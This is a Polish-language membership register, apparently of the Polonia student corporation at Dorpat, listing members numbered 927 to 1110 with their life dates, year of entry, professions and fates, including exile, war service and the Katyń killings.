 927. Adolf Ostromęcki, (1818 - po 1889) - s. Adolfa, coetus II sem. 1836, uczestnik spisku Hildebrandta, zesłany [104]
 928. Ksawery Ostromęcki, (1846 -1886) - z gub. radomskiej, coetus I sem. 1867 [652]

  Stanisław Ostrowski, Wilno 1930 r.

 929. Stanisław Mieczysław Ostrowski, (9 września 1903 we Włocławku - 29 września 1944 w Warszawie) s. Michała (pułkownika, dowódcy 8 Brygady Kawalerii w Białymstoku), zięć Jana Muszyńskiego (Lechicja), absolwent humanistycznego gimnazjum państwowego w Toruniu 1923, student prawa UW 1924-26 oraz student i absolwent prawa UW 1928-33, c. II sem. 1928/29, wiceprezes sem. zim. 1930/31, prezes sem. zim. 1931/32, absolwent Szkoły Podchorążych Rezerwy Kawalerii w Grudziądzu 1927/28, ppor. rez. 4 Pułku Ułanów Krechowieckich, sędzia Grodzki w Białymstoku, żołnierz kampanii wrześniowej, porucznik AK (Warszawa “Kampinos”, w powstaniu warszawskim ps. “Nałęcz” walczył na Żoliborzu w Obwodzie “Żywiciel” Warszawskiego Okręgu AK oraz w Zgrupowaniu “Żaglowiec”, poległ, pochowany przy ul. Długiej 28, ekshumowany 1945, pochowany na Cmentarzu Wojskowym Budy-Zosiny [nr ew. 1427]

 930. Roman Oszczakiewicz, (1877 - 1919) - s. Wilhelma, coetus II sem. 1898, lekarz, zm. na Kaukazie [1120]
 931. Leopold Marcin Otto, (1819 - 1882) - s. Jakuba, coetus II sem. 1840, pastor e.a. Wybitna postać protestantyzmu polskiego [174]
 932. Adolf Owsiany, (1836 - ?) - ziemianin z gub. kowieńskiej, coetus II sem. 1854, lekarz, [492]
 933. Lech Pac-Pomarnacki, (1830 - po 1906) - s. Józefa, coetus I sem. 1854, lekarz w Dyneburgu [486]
 934. Konstanty Palczewski I, (1818 - ?) - z guberni grodzieńskiej, coetus I sem. 1836, urzędnik tłumacz w 2 oddziale 5 departamentu Senatu [99]
 935. Julian Paklerski, (1870 - ?) - z gub. warszawskiej, coetus II sem. 1889 [1046]
 936. Konstanty Palczewski II, (1826 - przed 1889) - coetus II sem. 1844, nauczyciel gimn. Wilno. [232]
 937. Władysław Palkowski, (1845 -?) - pochodził z Mohylewszczyzny, coetus I sem. 1866, [638]
 938. Czesław Pancerzyński, (1854 - 1907) - s. Waleriana, coetus I sem. 1874, inż. górniczy, geolog, finansista, dyrektor kopalni i fabryk na Uralu, zwolennik współpracy polsko-litewskiej, krzewiciel piśmiennictwa litewskiego [724]
 939. Feliks Pancerzyński, (1862 - 1914) - z Kowieńszczyzny, coetus I sem. 1886, lekarz [964]
 940. Bronisław Pankiewicz, (1899 - 1942) - coetus II sem. 1919/20, inż. rolnik, zamordowany przez Niemców w Baranowiczach [1323]
 941. Władysław Pańkowski, (1831 - 1863) - coetus I sem. 1854, poległ w powst. 1863 r. [485]
 942. Julian (Juliusz) Pastaneci, (1838 -1893) - s. Karola Wilhelma, coetus I sem. 1859, pastor e.a. w Łomży i Mariampolu [589]
 943. Adam Paszkiewicz, (1831 - ?) - ziemianin z gub. Mińskiej, coetus I sem. 1849 [338]
 944. Antoni Paszkiewicz I, (1832 - 1887) - coetus II sem. 1849, inspektor Gabinetu Fizycznego Uniw. w Dorpacie [344]
 945. Antoni Paszkiewicz II, (1863 - ?) - coetus II sem. 1883, ziemianin z gub. mińskiej [921]
 946. Józef Paszkiewicz, (1860 - ?) - coetus II sem. 1879, inżynier, zmarł w Archangielsku [818]
 947. Józef Paszkiewicz-Tołłokoński, (1873 - ok. 1900) - coetus I sem. 1890, lekarz, ziemianin, z Wileńszczyzny, (jego brat Daniel był Arkonem) [1055]
 948. Olgierd Jerzy Paszkiewicz, (1907 w maj. Gojluny pow. Rosienie na Litwie - 14 V 1942) - s. Mariana i Adeli z Bagieńskich, coetus I sem. 1927/28, absolwent Polskiego Gimnazjum im. A.Mickiewicza w Kownie, działacz polski na Litwie, literat, tłumacz. Kierownik literacki wychodzącego w Kownie „Dnia Polskiego”, żołnierz AK, zamordowany przez partyzantów sowieckich w pobliżu obecnej granicy litewsko-białoruskiej [1414]
 949. Stefan Paszkiewicz, (1817 - ok. 1865) - coetus I sem. 1838, mieszkaniec Kowna [135]
 950. Witold Paszkiewicz, (1851 -1888) -z gub. kowieńskiej, coetus II sem. 1875, zmarł w czasie studiów [744]
 951. Alfons Paszko, (1886 - 23 listopada 1972) - s. Adolfa, brat Ryszarda (1111), coetus II sem. 1904, nauczyciel gimn. W-wa [1160]
 952. Ryszard Paszko, (1878-1940) - s. Adolfa, brat Alfonsa (1160), coetus II sem. 1896, pastor e.a., po 1918 r. Naczelny Kapelan WP, Płk. WP. W 1939 r. ochotnik, jeniec sowiecki w Ostaszkowie. Zamordowany w Twerze, pochowany w Miednoje. Ofiara zbrodni katyńskiej [1111]
 953. Julian Paszkowski, (ok. 1815 ? - ?) - coetus I sem. 1833, urzędnik w urzędzie gubernialnym w Augustowie [51]
 954. Józef Zadora Paszkowski, (1893 - 1933) - coetus I sem. 1914, POW, ochotnik WP (1918 - 21), ppor. odznaczony Krzyżem Walecznych. sędzia w Mołodecznie [1292]
 955. Witold Zadora Paszkowski, (1891 - 1919) - lekarz, coetus I sem. 1912, kpt. WP, poległ 23 XII [1265]
 956. Jan Patzer, (1835 - ?) - studiował fizykę, coetus I sem. 1857, mieszkał we Wrocławiu [552]
 957. Antoni Pautyński, (1860 - ?) - z Mołdawii, coetus II sem. 1879 [811]
 958. Adolf Pawiński, (1840-1896) - s. Jana, coetus I sem. 1862, historyk, archiwista, prof. U.W. dyr. Archiwum Głównego, czł. PAU [610]
 959. Jerzy Pawlikowski, (1903 - 1966) - ochot. WP (1920 - 21), coetus I sem. 1926/27. Po wojnie w zarządzie portu, zm. w Gdańsku [1400]
 960. Edward Pawłowicz, (1837 - 1894) - s. Józefa, coetus I sem. 1857, nauczyciel, założyciel i dyrektor Prywatnej Szkoły Realnej w Kaliszu [537]
 961. Stanisław Pawłowicz, (1900 - 1950) -s. Adolfa, ochotnik WP (1919 -1920), coetus II sem. 1924/25 [1385]
 962. Dionizy Peliski, (1847 - ?) - z Wileńszczyzny, coetus I sem. 1867 [651]
 963. Bolesław Peżarski, (1863 - ?) - stud. medycyny, coetus II sem. 1888, opuścił Dorpat bez dyplomu [1033]
 964. Józef Pęski, (1876 - ?) - z Podola, coetus I sem. 1902, studiów nie skończył [1141]
 965. Edward Pfabe, (1860 - 1919) - s. Edwarda, coetus II sem. 1881, lekarz w Sosnowcu Wolbromiu [864]
 966. Jan Pfeffer, (1836 - ?) - coetus I sem. 1857, lekarz, m in. w Dziśnie [540]
 967. Gustaw Phull, (1865 - po 1932) - s. Karola, coetus II sem. 1884, lekarz w Chmielniku [929]
 968. Zdzisław Piasecki, (1854 - 1922) - s. Władysława, coetus II sem. 1873, adwokat, ugodowiec - wydawał m. in. „Dziennik Lubelski” (1906 r.) [722]
 969. Eugeniusz Piaszczyński, (1890 - 1928) - s. Józefa, coetus II sem. 1909, lekarz kpt WP, asystent I kliniki Chir. Uniw. Warszawskiego [1239]
 970. Władysław Pieczyski, (1864 - przed 1927) - coetus II sem. 1883, matematyk, nauczyciel w Petersburgu [917]
 971. Bolesław Piekarski, (1912-1978) - coetus I sem. 1931/32, w 1939 r. przedostał się na Zachód, pracownik sekcji Polskiej BBC [1450]
 972. Ludwik Pieńkowski, (1830 -1905) - s. Dominika, ziemianin z pow. bielskiego, coetus I sem. 1852, za powst. 1863 r. zesłany [423]
 973. Apolinary Pietkiewicz, (1828 - 1891) - coetus I sem. 1850, autor pierwszego polskiego podręcznika meteorologii [349]
 974. Józef Pietkiewicz, (1831 - ?) - coetus I sem. 1857, mieszkał w Dorpacie [557]
 975. Leonard Pietkiewicz, (1857 - 1932) - coetus I sem. 1878, lekarz w Nowogródku [783]
 976. Michał Pietkiewicz, (1856 - 1938) - coetus II sem. 1877, współorganizował przed I wojną światową zjazdy filisterskie w Kijowie, lekarz, akuszer w Kijowie i Warszawie [766]
 977. Teodor Pietkiewicz, (1837 - po 1879) - coetus I sem. 1857, lekarz
 978. Andrzej Pikiel, (1911- 28 listopada 1995 w Warszawie) - s. Leonarda, magister inżynier USB, żołnierz AK- Wilno [1475]
 979. Ignacy Pilawski, (1825 - przed 1889) - ziemianin, coetus I sem. 1845, za powst. 1863 r. zesłany [248]
 980. Józef Pilitowski, (1867 - po 1907) - coetus II sem. 1885, adwokat w Płocku, działacz endecki, za udział w wiecu (1905 r.) i „obrazę majestatu”, skazany na 2 miesiące twierdzy [953]
 981. Erazm Piotrowski, (1818 - po 1868) - ziemianin, coetus II sem. 1843, za powst. 1863 r. zesłany do gub. irkuckiej [221]
 982. Jan Korwin Piotrowski, (1855 - 1901) - s. Wincentego, brat Kazimierza (735), brat Gabrieli Zapolskiej, coetus I sem. 1875, dr ekon., dziennikarz, literat [734]
 983. Józef Piotrowski I, (1829 - 1885) - s. Józefa, coetus I sem. 1851, lekarz w Warszawie [385]
 984. Józef Piotrowski II, (1868 - 1916) - s. Józefa (385), coetus I sem. 1888, lekarz w Warszawie, redaktor „Zdrowie” [1014]
 985. Kazimierz Korwin Piotrowski, (1854 -1922) - s. Wincentego, brat Jana (735), brat Gabrieli Zapolskiej, coetus II sem. 1875, urzędnik przy gub. estlandzkim, czynnie popierał rusyfikację, co Konwent uznał za „uwłaczające w najwyższym stopniu godności filistra” i pozbawił praw fil. (11 XI 1897 r.), wydawca „Ziarna”, adwokat w Warszawie [735]
 986. Stanisław Piotrowski, (1891 - 1939) - coetus I sem. 1912, drugi olderman „wileński”. Ochotnik WP (1919 - 21), odzn. Krzyżem Walecznych, rtm. 13 p. uł. sędzia Sądu Grodzkiego w Mołodecznie, zamordowany przez bolszewików 18 IX [1268]
 987. Władysław Piotrowski I, (1848 - po 1882)- s. Karola, coetus II sem. 1871, lekarz w Inflantach, ziemianin w łomżyńskiem [694]
 988. Władysław Piotrowski II, (1870 - 1937) - coetus I sem. 1889, inż. chemik - działacz oświatowy w Warszawie, Katowicach i wśród Polonii zagranicznej [1036]
 989. Antoni Pisani (Pizani), (1871 - 1914) - s. Mikołaja, coetus II sem. 1892, lekarz w Wilnie [1076]
 990. Antoni Pissarzewski, (1854 - 1878) - coetus II sem. 1874, zginął w pojedynku w Warszawie [729]
 991. Kazimierz Plater, (1829 - 1853) - coetus I sem. 1850, zmarł (utonął) w czasie studiów, autor szopki konwentowej [347]
 992. Teodor Plater, (1835 - 1865) - ziemianin zgub. kowieńskiej, coetus II sem. 1854 [497]
 993. Andrzej hr. Plater-Zyberk, (1856 - 1928) - s. Stanisława, brat Józafata (800), coetus I sem. 1877, ziemianin z gub. witebskiej [761]
 994. Józefat hr. Plater-Zyberk, (1859 - 1933) - s. Stanisława, brat Andrzeja (761), coetus II sem. 1878, ziemianin w gub. witebskiej [800]
 995. Ludwik hr. Plater-Zyberk, (1853 - 1939) - s. Henryka, brat Wiktora (731), ojciec Stefana (Arkonia), ziemianin (Litwa Kowieńska), coetus II sem. 1872 [710]
 996. Michał hr. Plater-Zyberk, (1834 - ?) - s. Józefa, ziemianin z gub. witebskiej, coetus I sem. 1854 [474]
 997. Wiktor Kazimierz Konstanty hr. Plater-Zyberk, (18 luty 1855 w Lixnie - 7 grudnia 1918) - s. Henryka, brat Ludwika (710), coetus II sem. 1874, dr praw, sędzia pokoju, ziemianin z pow. szawelskiego [731]
 998. Felicjan Pląskowski, (1825 - 1858) - s. Kajetana, brat Romualda (199), coetus I sem. 1846, urzędnik, w 1848 r. śledzony za rozmowy „patriotyczne” [262]
 999. Romuald Pląskowski, (1821 - 1896) - s. Kajetana, brat Felicjana (262), coetus I sem. 1842, lekarz psychiatra, prof. Szk. Głównej w Warszawie [199]
 1000. Jerzy Plejewski, (1905 - po 1945) - coetus II sem. 1927/28, zmarł po wojnie w Białymstoku, był adwokatem [1418]
 1001. Wiktor Plissowski, (1839 - po 1884) - coetus I sem. 1863, nauczyciel na płd. Rosji [617]
 1002. Jerzy Płachecki, (1890 - po 1939) - coetus II sem. 1916, ochotnik WP (1918 - 21), kpt. lekarz, wywieziony do ZSRR - „zaginął” [1303]
 1003. Stanisław Podbowicz, (1803 - ?) - z Kalisza, coetus II sem. 1929, zm. w czasie studiów? [25]
 1004. Aleksander Podczaski, (1881 - ?) - z pow. lipnowskiego, coetus II sem. 1903 [1156]
 1005. Walenty Podgórski, (1819 - po 1863) - s. Tomasza, coetus II sem. 1836, uczestnik spisku k. Hildebrandta, zesłany [108]
 1006. Aleksander Pokuta, (1892 - 1918) - coetus I sem. 1913, zmarł w Rydze [1281]
 1007. Kazimierz Polanowski, (1844 - 1897) - coetus II sem. 1865, dyr. cukrowni na Wołyniu [636]
 1008. Bernard Polikier, (1857 - 1914) - z Lublina, coetus I sem. 1880, lekarz [831]
 1009. Bolesław Pomianowski, (1835 - ?) - ziemianin w gub. lubelskiej, coetus II sem. 1855, [512]
 1010. Bolesław Poncet de Sandon, (1866 - 1938) - coetus II sem. 1888, lekarz w Kijowie, później w Warszawie, działacz oświatowy [1023]
 1011. Roman Ponikwicki, (1813 - ?) - s. Tadeusza, ziemianin, coetus II sem. 1833, uczestnik spisku braci Skarżyńskich (1846 r.) [62]
 1012. Adam Popławski, (1894 - po 1934) - coetus I sem. 1914, ppor (rez.) 24 p. piech., adwokat [1290]
 1013. Wilhelm Popławski, (1901-1975) - s. Józefa. POW, ochotnik WP (1918 - 20 ), coetus I sem. 1921/22, adwokat, żołnierz AK, w PRL więziony [1341]
 1014. Antoni Porębski, (1903 - po 1947) - s. Jana, ochotnik WP (1920), coetus II sem. 1924/25, adwokat w Warszawie, 1945 wywieziony do ZSRR [1388]
 1015. Czesław Porębski, (1864 - 1889) - coetus II sem. 1887, zmarł w czasie studiów [999]
 1016. Gustaw Poths, (1836 - 1911) - s. Jerzego, coetus I sem. 1856, ziemianin z gub. warszawskiej [519]
 1017. Jakub Ksawery hr Potocki, (1863 w Brzeżananach na Ziemi Lwowskiej - 28 września 1934 w Helenowie na Mazowszu) herbu Pilawa (Srebrna), s. Stanisława i Marii Konstancji ks. Sapieha, c. I sem. 1885, ziemianin, twórca fundacji do walki z chorobami płuc i rakiem [nr ew. 946] [vide szerzej PSB, t. 28, s. 23]
 1018. Karol hr Potocki, (1859 - 30 listopada 1885 w Krakowie) herbu Pilawa, s. Antoniego Józefa i Izabeli Marii hr. Borch, brat Tomasza (Konwent Polonia nr ew. 799) i Władysława Michała (Arkonia), stryj Krzysztofa (Kujawja), c. I sem. 1878, ziemianin - maj Moskorzewo, kielecczyzna [nr ew. 798]

  Tomasz Potocki, prawd. lata 80-te.

 1019. Tomasz hr Potocki, (12 maja 1860 w maj. Moskorzewo - 26 września 1912 w Warszawie) - herbu Pilawa, s. Antoniego Józefa i Izabeli Marii hr. Borch, brat Karola (Konwent Polonia nr ew. 798) i Władysława Michała (Arkonia), ojciec Krzysztofa (Kujawja), c. II sem. 1878, ziemianin w suwalskiem, działacz gosp., wspierał finansowo budowę Teatru Polskiego w Warszawie, literat. [nr ew. 799]

 1020. Gustaw hr. Potworowski, (1861 - 1898) - s. Adama, coetus I sem. 1882, chemik, dyr. cukrowni Uładowka na Wołyniu [872]
 1021. Zbigniew Poziomski, (1827 - przed 1889) - s. Józefa, coetus II sem. 1844, „znany z figlów burszowskich”, ziemianin [233]
 1022. Józef Poznański, (1821 - 1857) - coetus I sem. 1846, lekarz na Podolu [266]
 1023. Olgierd Pożaryski, (1896 - 1919) - coetus II sem. 1914, lekarz, zginął walcząc w armii gen. Judenicza [1295]
 1024. Cyprian Prószyński, (1825 - ?) - s. Alojzego, ziemianin z Wołynia, coetus I sem. 1844 [224]
 1025. Eugeniusz Tadeusz Pruszanowski, (1820 - ?) - coetus I sem. 1838, ziemianin, powiat bobrujski [134]
 1026. Ezechiel Pruszanowski, (1850 - ?) - brat Roberta (771), z gub. mińskiej, coetus I sem. 1874 [726]
 1027. Robert Pruszanowski, (1851 - 1885) - brat Ezechiela (726), coetus II sem. 1877, „uwieczniony” w żartobliwym poemacie J. Weyssenhoffa „Pieśń o Robercie i Kotku”, lekarz w gub. mińskiej [771]
 1028. Wincenty Pruszyński, (1862 - 1915) - coetus II sem. 1884, nauczyciel w Dorpacie [932]
 1029. Adolf Przeciszewski, (1832 - 1888) - s. Adolfa, brat Zygmunta (379), ziemianin, coetus I sem. 1851, marszałek szlachty pow. rosieńskiego [389]
 1030. Franciszek Przeciszewski, (1834 - ?) - coetus I sem. 1855, lekarz w Podrosieniach [504]
 1031. Zygmunt Przeciszewski, (1830 - 1862) - s. Adolfa, brat Adolfa (389), ziemianin w pow. rosieńskim, coetus I sem. 1851 [379]
 1032. Gustaw Przewłocki, (1892 - 1951) - coetus II sem. 1910, urzędnik w Urz. Woj. Wileńskim [1255]
 1033. Mieczysław Radwan-Przygodzki, (1903 -1927) - coetus I sem. 1925/26, zginął w pojedynku [1393]
 1034. Antoni Puciata, (1832 - ?), s. Piotra, ziemianin z gub. mińskiej, coetus I sem. 1854, zmarł młodo [488]
 1035. Marian Puciata, (1873 - po 1928) - s. Atanazego, coetus I sem. 1899, lekarz, zmarł w Rumunii [1124]
 1036. Ludwik Skarbek-Puczniewski, (1832 - 1878) - coetus II sem. 1850, lekarz, ziemianin w pow. brzesko - litewskim [377]
 1037. Wojciech Pułaski (Puławski), (1860-1916) - z Kaliskiego, coetus II sem. 1880, przemysłowiec, dyr. „Prodamety” w Petersburgu [844]
 1038. Aleksander Pysznicki, (1816 - 1885) - ziemianin, majątek Kazimierzów w guberni witebskiej, coetus I sem. 1835 [86]
 1039. Jerzy Rabczewski, (1901- 14 lutego 1981) - s. Piotra, coetus II sem. 1925/26, I wiceprezes Stulecia, wiceprokurator Sądu Apelacyjnego w Wilnie, w 1939 r. przez Litwę przedostał się na Zachód. Pracował w wywiadzie. Zmarł w Londynie [1397]
 1040. Stefan Radomyski, (1864 - 1913) - s. Konstantego, coetus II sem. 1886, lekarz w Lublinie [983]
 1041. Aleksander Radowicki, (1818 - ?) - s. Antoniego, ziemianin, coetus II sem. 1836 [105]
 1042. Uraniusz Radziewicz, (1816 - przed 1889) - z guberni mińskiej, ziemianin, coetus II sem. 1834 [81]
 1043. Albert ks. Radziwiłł, (1868 - 1927) - s. Macieja, coetus II sem. 1888, ziemianin, maj. Poloneczka w gub. mińskiej [1025]
 1044. Rafał Radziwiłłowicz, (1860 - 1929) - s. Ignacego, coetus II sem. 1879, lekarz psychiatra, sympatyk PPS, mjr lek. WP (1919 - 1920), prof. USB., mason (Wielki Mistrz Wielkiej Loży Narodowej Polskiej), działacz antyalkoholowy [821]
 1045. Aleksander Ramm, (1865 -1916) - s. Aleksandra, coetus II sem. 1886, ziemianin w Białostockiem [973]
 1046. Jan Ratajewicz, (1873 -1939) - s. Józefa, coetus II sem. 1898, lekarz w Warszawie [1121]
 1047. Teodor Rathke, (1844 - po 1881) - coetus II sem. 1866, pastor e.a. m. in. w Irkucku, ziemianin na Wołyniu [647]
 1048. Zygmunt Rawicz-Kujawski, (1865 - 1934) - s. Aleksandra, coetus II sem. 1887, lekarz w Warszawie [1011]
 1049. Marcin Reczyński, (1802 - 1879) - s. Stefana. Studiował teologię na Uniw. w Marburgu, należał tam do Burschenschaftu, następnie był studentem Uniw. Wileńskiego, aresztowany w 1821 r (krótko) za kontakty z Związkiem Burszów Polskich na Uniw. Warszawskim, założyciel Konwentu Polonia. Nauczyciel, dyr. szkoły w Kiejdanach. [2]
 1050. Marian Regulski, (1865 - ?) - coetus I sem. 1885, lekarz, zmarł w Tbilisi [947]
 1051. Michał Reiner, (1838 - ?) - coetus II sem. 1857, mieszkał w Warszawie [558]
 1052. Stanisław Reinhardt, (1894 - 1941) - coetus II sem. 1912, ochotnik WP (1920), sędzia śledczy i adwokat w Białymstoku, zabity przez bolszewików 30 VI [1271]
 1053. Ludwik Reniger, (1860 - 1941) - s. Stefana, coetus II sem. 1881, lekarz, aktywny w ZWZ, AK, aresztowany przez bolszewików (miał 81 lat), wywieziony na Syberię, zmarł w obozie [862]
 1054. Ludwik Reuther, (1843 - ?) - coetus II sem. 1862, nauczyciel gimn. ks. Anny w Petersburgu [615]
 1055. Konstanty Rewieński I, (1830 - przed 1889) - s. Kazimierza, brat Stanisława (217), coetus I sem. 1849, ziemianin [329]
 1056. Stanisław Rewieński, (1825 - 1907) - s. Kazimierza, brat Konstantego (329), ziemianin, coetus I sem. 1843, płodny pisarz i publicysta rolniczy [217]
 1057. Jerzy Robaczewski, (1906 - 1939) - s. Noego, coetus I sem. 1933/34, w partyzantce (oddz. płk. Jerzego Dąmbrowskiego - na pograniczu litewskim), zaginął (?) w październiku [1469]
 1058. Aleksander Rodkiewicz, (1913 - 1944) - coetus I sem. 1932/33 [1467]
 1059. Marian Römer, (3 marca 1893 - 1920) s. Antoniego i Marianny z d. Liubimowa, c. II sem. 1912, ochotnik WP, por. - poległ pod Grajewem [nr ew. 1270] [Źródło (poza wskazanymi poniżej spisu członków): Archiwum (baza danych osobowych) Kurlandzko-Inflanckie]
 1060. August Rössler, (1859 - ?) - z Radomia, studiował prawo, nie skończył, coetus II sem. 1877 [765]
 1061. Mustafa Stefan Romanowicz, (1899 - 12 lipca 1976) - s. Aleksandra (gen. WP), ochotnik WP (1920), coetus I sem. 1922/23, sędzia Sądu Okręgowego w Wilnie, we wrześniu 1939 r. przez Litwę wydostał się na Zachód, po wojnie na emigracji w Argentynie [1350]
 1062. Antoni Romer, (1831 - ?) - ziemianin na Wołyniu, coetus I sem. 1853 [443]
 1063. Adolf Rondthaler, (1832 - 1877) - s. Augusta, brat Teofila (543) i Bertolda (599), coetus II sem. 1852, pastor e.a. w Lipnie [433]
 1064. Bertold Rondthaler, (1839 - 1900) - s. Augusta, brat Adolfa (433) i Teofila (543), coetus I sem. 1860, pastor e.a., działacz społeczny w Łodzi [599]
 1065. Teofil Rondthaler, (1839 - 1901) - s. Augusta, brat Adolfa (433) i Bertolda (599), coetus I sem. 1857, lekarz w Piotrkowie [543]
 1066. Stefan Ronthaler, (1867 -1954) - s. Bertolda (599), coetus II sem. 1886, lekarz w Warszawie. W II RP - lekarz Bratniej Pomocy Żołnierza Polskiego, współwłaściciel „Medycyny i Kroniki Lekarskiej” [977]
 1067. Witold Rosé, (1816 -1856) - s. Wincentego, coetus II sem. 1834, lekarz w Warszawie [82]
 1068. Henryk Rossman I, (1825 - 1884) - s. Franciszka, coetus I sem. 1847, urzędnik administracji Królestwa [279]
 1069. Henryk Rossman II, (1831 - 1867) - s. Henryka, coetus II sem. 1951, lekarz w Warszawie, literat [403]

  Zygmunt Rossman, po 1945 r.

 1070. Zygmunt Rossman, (16 lipca 1898 - 1955) herbu własnego, s. Kazimierza i Heleny z d. Rodkiewicz, brat Henryka (Welecja) i stryjeczny brat Andrzeja (Kujawja), ochotnik WP (1918 - 21), c. II sem. 1922/23, adwokat w Warszawie [nr ew. 1361]

 1071. Walenty Władysław Rościszewski, (1869 - 1926) - coetus II sem. 1887, chemik, zmarł w Warszawie [1000]
 1072. Władysław Rothert, (1863 - 1916) - s. Gustawa, coetus II sem. 1880, wybitny botanik, prof. uniwersytetów w Kazaniu, Charkowie i Odessie, członek PAU [837]
 1073. Mieczysław Rouba, (1915 - 19 lipca 1974) - coetus II sem. 1933/34, urzędnik w Banku Rolnym w Wilnie, po wojnie adwokat w Pułtusku [1478]
 1074. Eugeniusz Rozenberg, (1827 - 1876) - coetus II sem. 1846, pastor e.a. w Przasnyszu i Gostyninie [271]
 1075. Zygmunt Różański, (1861 - po 1928) - coetus I sem. 1886, lekarz w Łazach k. Zawiercia [967]
 1076. Czesław Różycki, (1862 - ?) - coetus II sem. 1882, lekarz w Żytomierzu [885]
 1077. Stefan Różycki, (1886 - 1953) - s. Salezego, coetus II sem. 1909, lekarz - anatom, prof. Uniw. w Lwowie i Poznaniu (tam także dziekan), działacz sanacyjny (Związek Naprawy Rzeczypospolitej). W czasie okupacji w W-wie, m.in. w tajnym nauczaniu uniwersyteckim. Po wojnie wrócił na Uniw. Poznański. W Poznaniu jest ul. jego imienia [1236]
 1078. Karol Rudnicki, (1854 - ?) - coetus II sem. 1876, dr zoologii, urzędnik ros. kolei żelaznych w Rydze [749]
 1079. Konstanty Rudomina, (1862 - ?) - coetus II sem. 1882, lekarz w Wilnie [888]
 1080. Gustaw Rupniewski, (1833 - 1874) - s. Łukasza, coetus I sem. 1852, nauczyciel gimnazjalny w Kijowie, Odessie [415]
 1081. Władysław Rupniewski, (1855 -?) - s. Bolesława, coetus II sem. 1876, dr chemii, ziemianin z Wołynia, badacz starożytności [755]
 1082. Erazm Rusiecki, (1861 - 1887) - s. Juliana, coetus II sem. 1882, student medycyny, ziemianin [886]
 1083. Bolesław Russocki, (1843 - po 1905) - coetus I sem. 1861, uczestnik powst. 1863 r., adwokat, podsędek [603]
 1084. Józef Rusteyko, (1828 - 1907) - s. Franciszka, coetus I sem. 1847, w 1848 r. zbiegł do powst. węgierskiego, działacz emigracyjny [281]
 1085. Aleksander Ruszczyński, (1884 - 1967) - coetus II sem. 1907, kpt I p. Lot. WP 1918-21, właściciel magazynu jubilerskiego w Warszawie [1195]
 1086. Józef Rutkiewicz, (1901 - 1942) - s. Mamerta, coetus II sem. 1921/22, Sekretarz Wil. Koła Filistrów. Ochotnik WP (1919 - 20), adwokat w Wilnie. Aresztowany przez NKWD, wywieziony 23 VI 1941 r. (ostatnim transportem). Zwolniony w 1942 r., zmarł w drodze do II Korpusu, w Kokandzie [1343]
 1087. Kazimierz Rutkiewicz, (1898 - 1940) - s. Michała, w l. 1915-1916 w harcerstwie (tajnym), POW, w 1918/19 uczestnik samoobrony Wilna, coetus II sem. 1919/20, V-prokurator Sądu Apelacyjnego w Warszawie. W niewoli sowieckiej, więzień Kozielska, zamordowany w Katyniu [1308]
 1088. Oskar Rutkowski, (1871 - 1930) - s. Kazimierza, coetus II sem. 1892, ziemianin, Litwa Kowieńska [1077]
 1089. Antoni Rybski, (1822 - przed 1852) - s. Antoniego, brat Franciszka (208) i Konstantego (213), coetus I sem. 1842, zmarł wkrótce po studiach [207]
 1090. Franciszek Rybski, (1824 - ?) - s. Antoniego, brat Antoniego (207) i Konstantego (213), coetus I sem. 1842, nauczyciel gimnazjalny w Szawlach i Nikołajewie [208]
 1091. Konstanty Rybski, (1825 - ?) - s. Antoniego, brat Antoniego (207) i Franciszka (208), ziemianin, coetus I sem. 1843 [213]
 1092. Stanisław Rychter, (1871-1953) - s. Władysława, coetus II sem. 1892, naczelny lekarz Tramwajów Miejskich i Warszawskiej Kolei Dojazdowej [1080]
 1093. Antoni Rydzewski, (1836 - 1913) - s. Mikołaja, coetus II sem. 1855, początkowo urzędnik, później rozmiłowany w Alpach (szczególnie dolina Bergagalia na pograniczu szwajcarsko – włoskim), zasłużony alpinista, fotografik i publicysta [511]
 1094. Celestyn Rymgajłło, (1824 - 1850) - coetus II sem. 1848, zmarł w czasie studiów [323]
 1095. Sylweriusz Rymkiewicz, (1816 - 1886) - coetus II sem. 1832, uczestnik powst. 1863 r., zesłany, zmarł w Tobolsku [44]
 1096. Adam Rymsza, (1860 - 1923) - s. Romualda, brat Edwarda (914), Wacława (933) i Romana (975), coetus II sem. 1880, współtwórca Wil. Koła Filistrów, lekarz - społecznik w Wilnie [848]
 1097. Edward Rymsza, (1863 - 19 lipca 1937), s. Romualda, Brat Adama (848), Wacława (933) i Romana (975), coetus II sem. 1883, ziemianin z pow. lidzkiego, inżynier [914]
 1098. Roman Rymsza, (1867 - 1919) - s. Romualda, brat Adama (848), Edwarda (914) i Wacława (933), coetus II sem. 1886, ziemianin [975]
 1099. Wacław Rymsza, (1862 - 1922) - s. Romualda, brat Adama (848), Edwarda (914) i Romana (975), coetus II sem. 1884, lider konwentowej „konserwy”, lekarz w Hurynowszczyźnie (gub. mińska) [933]
 1100. Adam Rzepecki, (1827 - przed 1889) - coetus I sem. 1850, nauczyciel gimn. w Słucku [362]
 1101. Adam Rzyszczewski, (1857 - ?) - s. Aleksandra, ziemianin z Wołynia, coetus I sem. 1877 [757]
 1102. Adolf Sachs, (1839 - 1896) - s. Samuela, coetus II sem. 1858, pastor e.a w Wierzbołowie [580]
 1103. Edmund Sachs, (1837 - 1912) - coetus I sem. 1857, lekarz w Lublinie [544]
 1104. Edward Sachs, (1868 - 1957) - s. Edmunda (544), coetus II sem. 1889, lekarz w Warszawie, po II wojnie św. w Lublinie [1045]
 1105. Zygmunt Sachs, (1833 - ?) - studiował medycynę, studiów nie skończył, coetus II sem. 1858 [583]
 1106. Mieczysław Sadowski, (1843 - po 1887) - s. Ignacego, ziemianin w pow. telszewskim, był stud. Polit. Ryskiej i w korp. „Baltika”; coetus I sem. 1863, był w śledztwie z podejrzenia o udział w powst 1863 r. [618]
 1107. Adam Sajkiewicz, (1874 - 1941) - s. Ludwika, coetus II sem. 1895, ziemianin w pow. zamojskim, pierwszy w odrodzonej Polsce (od 5 XI 1918) zamojski starosta powiatowy [1104]
 1108. Antoni Sakiell, (1857 - ?) - coetus II sem. 1879, lekarz w Telszach [810]
 1109. Antoni Salmonowicz, (1894 - 1935) - s. Stanisława, brat Leona (1338), stryj Ludwika (Arkonia), ochotnik WP (1918 - 20), coetus II sem. 1920/21, prawnik, starosta w Kamieniu Koszyrskim (Polesie) [1327]
 1110. Leon Salmonowicz, (1897 - 1943) - s. Stanisława, brat Antoniego (1327), stryj Ludwika (Arkonia), POW, ochotnik WP (1918 - 21) - Krzyż Zasługi Wojskowej Litwy Śr., coetus II sem. 1920/21, cywilny analityk II Oddz. Szt. Gen. Pracownik Wil. Banku Ziemskiego, AK [1338]
